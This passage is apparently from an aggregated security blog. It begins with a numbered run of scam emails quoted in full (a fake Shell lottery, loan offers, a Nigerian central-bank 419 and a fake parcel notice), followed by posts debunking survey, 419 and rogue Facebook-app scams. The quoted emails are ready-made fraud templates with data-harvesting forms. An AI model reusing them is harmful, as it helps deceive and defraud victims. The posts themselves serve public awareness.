which you won through the email ballot draws in our Shell Management Lotto
Award on Febuary 1st 2011 in the second category prize winnings. Shell enjoyed
a reputation as a company found oil and gas. We wish to inform you that your
total prize money of US$500,000.00 Dollars has been returned to us by our Lotto
claims delivery company as unclaimed prize after their initial letter to your
address for your award payment was not successful.
We have six clearance offices zoned Continental, Namely: Canada, Brazil, South
Africa, Japan, London & Australia, clearance zones are picked randomly by
computer, each winning number falls within any of the clearance zones, is the
duty of the approved zonal clearance office to handle all clearance process to
make sure bank releases won prize in time
Your prize numbers fall at our African region approved clearance office in
Johannesburg, South Africa, in view of this; your prize money will be released
from Johannesburg: your money has been deposited in bank with insurance
coverage. Your clearance agent will facilitate payment process immediately you
contact him.
You are hereby requested to contact your clearance agent on his email address
below for your immediate award payment.
Name: Engr. GORDON SMITH
Office Address: Shell Building No: 68 Von Brandies Street Johannesburg,South
Africa.
Email: gordonsmith2010@live.com
Email:claimagent2010@luckymail.com
Mobile: +27 734469407
NOTE: ANY BREACH OF CONFIDENTIALITY ON THE PART OF THE WINNERS
WILL RESULT TO DISQUALIFICATION. WINNING RESULT MUST BE KEPT
SECRET TO AVOID DOUBLE CLAIM WHICH WILL RESULT TO YOUR LOST OF
PACKAGE.
Please note: You have to reconfirm your full details to him such as:
1. Name in full:…………………………………..
2. Address:…………………………………………..
3. Nationality:…………………………………………
4. Age:/Sex …………………………………………………….
5. Occupation:……………………………………………….
6. Phone/Fax:………………………………………………….
7. Present Country:………………………………………………
Thanks,
Sincerely yours Prof. Carl Allison
(President; Int’l Lotto Org.)
IMPORTANT NOTICE
Make sure you keep contact only with the approved clearance agent, any
transaction you hold with other persons beside him is at your own risk, be aware
that your paying authority will affect payment swiftly upon satisfactory report,
verifications and validation provided by the clearance office prior payment in
accordance with policy of organizers of this promotion.
SIMPLY REPLY TO YOUR CLEARANCE AGENT

8.

Good Day

We give out financial assistance to those who have a dream business but is faced with the challenges of finance.We help you actualize your dream faster and easier in a way of rendering you financial assistance.You can obtain loan from us at a very low interest rate. Grab this opportunity now. You can contact us via our mail:

richardchristensen1@live.com
Thanks
Mr. Richard Christensen

9.

Dear Sir/Madam.,

I am Mr. John Kelly (CEO) Kelly Loans Inc,
I am a private loan lender .We give out loans to business people and
individuals for just 3% interest rate.

We give out local and international loans to any body all over the
world.We give out loans via account transfer to what ever country you
are.We are not a bank and we do not require much documents.

If you are interested in getting a loan from our company, contact us
with the following details.(johnkellyloans@gmail.com)
==================================
FIRST NAME:……………
LAST NAME:…………..
ADDRESS:……………..
COUNTRY:………………
SEX:………………
HOME PHONE NUMBER:………..
VALID CELL PHONE NUMBER………….
FAX NUMBER: ………….
OCCUPATION:………….
MONTHLY INCOME………..
AGE:…………………
LOAN AMOUNT NEEDED:……
LOAN DURATION…………

Thanks.
Mr John Kelly…

10.

This is johnsonsmithloancompany10@gmail.com,is a private loan lender.We provide funding
for companies and individuals that need funding. We work domestic as well
as international companies. Our funding sources specialize in creative
solutions to meet your needs for expansion, growth etc.Our company do
grant loans to individuals and companies as the loan grant varies from
$3,000,00USD to $150,000,00USD with an interest rate of just 2.5% and
business loan ranging from $15,000,00USD to $30,000,000,00USD

Borrower’s Information Needed
Full Names:……………………
……………………
Country:…………………. ………………………..
Phone Number:………………….. …………………
Loan Amount Needed:………………….. ………..
Loan Term Duration:………………… …………….

Company
Registration Number: EA-ASL/941OYI/02/LN-UK
Telephone:
Fax:

Regards,

11.

Mr Maxwell Bar  has opened an opportunity to every one in need of any financial help. I give out loan to serious minded individuals. at 3% rate LOANS for developing business a competitive edge/ business expansion. * Personal Loans * Business Loans * Consolidation Loan. We are certified, trustworthy, reliable, efficient, Fast and dynamic. Contact us

via maxwellbarloanfirm@mail.mn come with this info.

AMOUNT NEEDED AS LOAN:
DURATION OF LOAN:
FULL NAMES:
COUNTRY/STATE/CITY:
TELEPHONE NUMBERS:
OCCUPATION:
MONTHLY INCOME:
MARITAL STATUS:
SEX:

Thanks.
Mr.Maxwell Bar

12.

This isjohnsonsmithloancompany10@gmail.com,is a private loan lender.We provide funding
for companies and individuals that need funding. We work domestic as well
as international companies. Our funding sources specialize in creative
solutions to meet your needs for expansion, growth etc.Our company do
grant loans to individuals and companies as the loan grant varies from
$3,000,00USD to $150,000,00USD with an interest rate of just 2.5% and
business loan ranging from $15,000,00USD to $30,000,000,00USD

Borrower’s Information Needed
Full Names:……………………
……………………
Country:…………………. ………………………..
Phone Number:………………….. …………………
Loan Amount Needed:………………….. ………..
Loan Term Duration:………………… …………….

Company
Registration Number: EA-ASL/941OYI/02/LN-UK
Telephone:
Fax:

Regards,

13. “Hi Dear,”

Hi Dear,

How are you today? I feel like communicating with you, my name is miss morrin It is my pleasure with due respect to cultivate a healthy friendship with you. I have great interest in making new friends, my hobbies are reading, traveling,swimming and dancing.

Today i found your contact email,then i took the opportunity to write to you as i will really want us to be good friends and I will so much appreciate it if we can click together as one great friend.

I will send my photo at least for you to see who is writing to you.I will like you to contact me back with this my email to my email address so that I will give you full explanation about myself, and my reasons and purpose of contacting you.

Please feel free to write me back.

Yours Sincerely,morrin

14.”LAMIDO SANUSI (GOV.CENTRAL BANK)”

Dear Friend,

My name is Malam Lamido Sanusii, my office monitors and controls the affairs of all other banks and financial institutions in Nigeria. I am the final signatory to any transfer or remittance of huge funds moving within banks both on the local and international levels. I have before me list of funds, which could not be transferred to some nominated accounts as these accounts have been identified either as ghost accounts, unclaimed deposits and over-invoiced sum etc.

I will add your name among the people expecting their funds to be transferred into their account, on this note; I wish to have a deal with you as regards to this funds. As it is my duty to recommend the transfer of these surplus funds to the Federal Government Treasury and Reserve Accounts as unclaimed deposits, I have the opportunity to write you based on the instructions I received two days ago from the Senate Committee on Contract Payments Foreign Debts to submit the List of payment reports expenditures and audited reports of revenues. Among several others, I have decided to remit this contract sum following my idea that we have a deal agreement and I am going to do this legally.

MY CONDITIONS ARE:

1. 1. The sum of USD$5.1 Million. Only will paid into an account I will provide you after you have confirmed the $10.2 million total amount transferred into your account by telegraphic Transfer (T/T), conformable in 3 working days.

2. This deal must be kept secret forever, and all correspondence will be strictly by email / telephone, for security purposes.

3. There should be no third parties as most problems associated with fund release are caused by agents or representative.

If you agree with my conditions, l advise you on what to do immediately and the transfer will commence without delay as I will proceed to fix your name on the Payment schedule instantly to meet the three days mandate. I hope you don’t reject this offer and have your funds transferred. I anticipate hearing from you.

Best Regards
Malam Lamido Sanusii
Email: lamido_sanusi1257@yahoo.com.hk
Email: lamidosanusi1120@yahoo.com
Governor, Central Bank of Nigeria (CBN)

15.

*Hi,
I am Mr.williama well-known, legitimate and an accredited money lender.
I loan money to people and companies in need of financial assistance.
Do you have bad credit or are in need of money to pay bills? Let me
take this medium to inform you that I assist beneficiary reliable as
I’ll be happy to offer a loan at 3.5% interest rate.
Services provided include:
* Refinance
* Home Improvement
* Inventor Loans
* Auto Loans
* Debt Consolidation
* Horse Loans
* Line of Credit
* Second Mortgage
* Business Lending
* Personal Loans
* International Loans
Please write back if the person accurately filled out the form below.
Upon Response, you will be sent soon as possible.
Full Names :……
Address :………
City :………
State :………
Postal Code :………
Country :………
Tel :………
Fax :………
Amount Needed: .. In USD or Euro ……….
Loan Duration :….
Loan Purpose:.
Occupation :…….
(No social security or credit check, 100% Guaranteed!)
I Look forward permitting me be of service to you. You can contact me
via e-mail: judgesmithloanfirm@gmail.com
Sincerely,
Reply as soon as possible.
william

16.

Hello,i am Mrs Jenetter Varlics from California Us,i was so most in need of loan to lift out contract so i motionless to go my bank though they refused to accede to me the loan since of credit check,so i posted the subject upon yahoo answer upon how i indispensable the loan,one Mr eric donaldson suggest the single legit loan association to me by the name Mrs Loveth Smith Loan Company,i motionless to give them the try to my biggest warn my loan was postulated as well as send to my bank comment but cosigner,collateral,credit check as well as with only 3% seductiveness rate so he grant me the loan,the sum of $3.000, i will suggest everybody out there which need the loan to hit them around this email,lovethsmith99@yahoo.com

thanks

Mrs Jenetter Varlics

17.”Investing $ 179 a day can earn $ 2000 U.S. dollars”

You Invest $ 179 and you can earn $ 1000-2000 per day automatic payment
This is evidence of payments:  http://s1.img.pl/v/1102/4754payout.gif

http://www.awardmails.biz/pages/index.php?refid=sangjongpay

18. “Post Express. Delivery refuse! NR12976″

Dear Customer

Your package has been returned to the Post Express office.
The reason of the return is “Error in the delivery address”

Attached to the letter mailing label contains the details of the package delivery.
You have to print mailing label, and come in the Post Express office in order to receive the packages.

Thank you for your attention.
Post Express Service.

Posted in Scam | Comments (9)

“Worst trip ever” email scam

This wandered into a spamtrap last night, and you should consider firing it into the heart of the Sun:

“Am sorry for not informing you about my propose trip to UK and presently I’m writing this with tears in my eyes,my family and I came down here to Cardiff,United Kingdom for a short vacation unfortunately we were mugged at the park of the hotel where we stayed,all cash,credit card and cell were stolen off us but luckily for us we still have our passports with us.

We’ve been to the embassy and the Police here but they’re not helping issues at all and our flight leaves in less than 3hrs from now but we’re having problems settling the hotel bills and the hotel manager won’t let us leave until we settle the bills.

Am freaked out at the moment,

Judy.”

Thanks, random person I’ve never met before!

Cardiff: where muggings prompt unsolicited emails and hotel managers chain you to your room until bills are settled. Or not (it’s actually a nice place, they film Doctor Who there and everything).

Christopher Boyd

Posted in GFI Software | Comments Off

Black Ops Map Pack Scam

Bits and pieces of popular culture will always be a target for scams, and we’ve already seen more than our fair share of Black Ops shenanigans; fake keygens / cracks back in November, and a curious tale from January of how gamers broke into a radiology server to play some rounds while apparently failing to touch the mass of personal info sitting on the compromised box.

February is almost upon us, and that means a new target enters the crosshairs – the Black Ops map pack downloadable content is available for all ($ 15 / £10 to you, guv’nor with a nifty Youtube preview to make you wave your wallet) and this means scammers are out in force.

fake programs ahoy

more fake programs

Amazingly, this is also a fake program

There's a theme developing here...

As with almost every scam these days, they just want to pop a survey and make some affiliate cash. At best, a dummy file is hiding behind the survey; at worst, you’ll end up with a nasty infection stomping up and down on your hard drive.

Survey time. Hooray.

Survey popping scams seem to be as popular as ever, which probably means a good chunk of people are still filling the things in then wondering why “dubiouswormthing.exe” causes their hard drive to melt.

Don’t be one of those melty hard drive people.

Christopher Boyd

Posted in GFI Software | Comments Off

A new scam

and a funny one.

Tonight, my wife received this email…

Hello dear,
My name is (deleted to protect the innocent),i am the Event manager/Director of (deleted again).we are also the official company handling the opening ceremony of The 2012 Olympic that will be held in UK.Cold Play and Shakira are to perform at this event and have agreed but we need your services as a song writer for this great artistes.
I will like you to get back to me if you are interested

The first clue that this is not legit is the salutation of “Hello dear”. Event managers of official companies are naturally friendly and effusive folk, I’m sure, but I’m fairly confident that they don’t address strangers as “Hello dear”. The second clue is the generally poor grammar and punctuation. The third clue is simply the unlikely prospect of a random songwriter being selected to provide content for Cold Play and Shakira. Remember, if something sounds too good to be true, it’s probably not true.

So, yes, it’s a scam, and a funny one, but there is something interesting about it, and that is that it was somewhat targeted. It wasn’t just randomly sprayed out to anyone and everyone, but when you look at the content, combined with the “To:” address (which I’ve not shared), it was clearly targeted at songwriters.

The 419-ers got a list from somewhere, and then structured their pitch as cunningly as they could. They weren’t catching my wife, but it’s interesting and instructive that 419s might now be more thoughtful.

It’s a new scam, or at least a new variant to my eyes, even if it is funny.

Keep safe folks

Roger

 

 

Posted in AVG | Comments Off

Facebook scam: Dad catches daughter stripping on webcam

How low is a Facebook scammer prepared to go? Here’s a pretty sick rogue application that we’ve seen affecting some users of the world’s most popular social network, leading to the all too familiar money-making survey scam at the end.

[Image: Dad catches Daughter stripping on Webcam updates]

OMG she is so busted!! Dad catches Daughter on Webcam! [LINK]

Hmm. It would be nice to think that no-one would be interested in clicking on a link like that. But human nature being what it is, some folks (guys in particular I would guess) might be tempted to find out more and find they aren’t able to show some restraint.

So, what does happen if you click on the link?

First thing you’ll see is this splash screen (I’ve used some pixelation to protect the innocent):

[Image: Dad catches Daughter stripping on Webcam splash screen]

If you are still tempted to click further, you’ll be asked by a rogue Facebook application to grant permission for it to be able to post to your wall.

[Image: Dad catches Daughter stripping on Webcam app]

By the way, it’s not just your personal Facebook page that the app will be able to post updates to – it will also be able to publish to any pages you might be responsible for, which could prove highly damaging if you administer a Facebook page for your firm.

So, after all this, do you get to see the video?

[Image: Dad catches Daughter stripping on Webcam survey]

Nope. Instead, you’ll be greeted by a survey. And this survey makes money for the scammers behind the scheme as they earn commission for every survey completed.

Worse still, your Facebook account has already been abused by the rogue application which has posted a message about the dad catching his daughter stripping on a webcam for all of your Facebook friends to see.

[Image: Dad catches Daughter stripping on Webcam messages]

Wow she got caught so dirty.

Busted!! Dad Catches Daughter on Webcam!
Do not watch unless 18+
Content is graphic. Watch at your own risk!

In this way the scam spreads virally, attempting to earn as much money as possible for the survey scammers.

I know there will be people out there who feel that anyone who clicks on links like this deserves everything they get, but that doesn’t mean the rest of us should be bombarded by spammy messages on Facebook just because some of our online friends have turned out to be a little bit seedy.

We’ve seen cybercriminals use grubby themes like this to spread their attacks, and no doubt we’ll see them again. Human nature isn’t going to change and people will carry on clicking on them unless they’re educated about the threats. Of course, it wouldn’t do any harm if Facebook could work a little harder at preventing scams like this occurring in the first place.

If you have been hit by scams like this on Facebook, and are struggling to clean up your profile, here’s a YouTube video I made which describes what steps you need to take:

Make sure that you keep informed about the latest scams spreading fast across Facebook and other internet attacks. Join the Sophos page on Facebook, where over 60,000 people regularly share information on threats and discuss the latest security news.

Full story: Naked Security – Sophos

Posted in Sophos | Comments (1)
